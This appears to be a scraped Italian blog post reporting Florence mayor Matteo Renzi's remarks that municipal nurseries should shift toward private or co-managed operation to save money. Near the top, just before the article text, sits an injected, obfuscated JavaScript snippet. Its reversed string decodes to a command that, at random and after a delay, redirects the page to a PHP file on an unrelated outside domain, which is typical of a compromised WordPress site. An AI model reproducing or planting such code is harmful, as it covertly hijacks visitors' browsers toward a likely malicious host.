Anche gli asili comunali ai privati. Dice Renzi.

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2011/08/asilo-nido.jpg”>“Non possiamo non immaginare” anche per un servizio come quello degli asili nido, “che un progressivo ruolo del Comune sia sempre più finalizzato al controllo rispetto alla gestione diretta”. Lo ha detto oggi il sindaco di Firenze Matteo Renzi.

“Gli asili nido a gestione diretta del Comune di Firenze – ha spiegato Renzi – costano circa 23 milioni: quelli che prevedono qualche forma di cogestione con il privato sociale ci costano circa il 70%. In tempi di tagli abbiamo lo spazio per fare le gestioni dirette come abbiamo fatto fino ad oggi?”.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *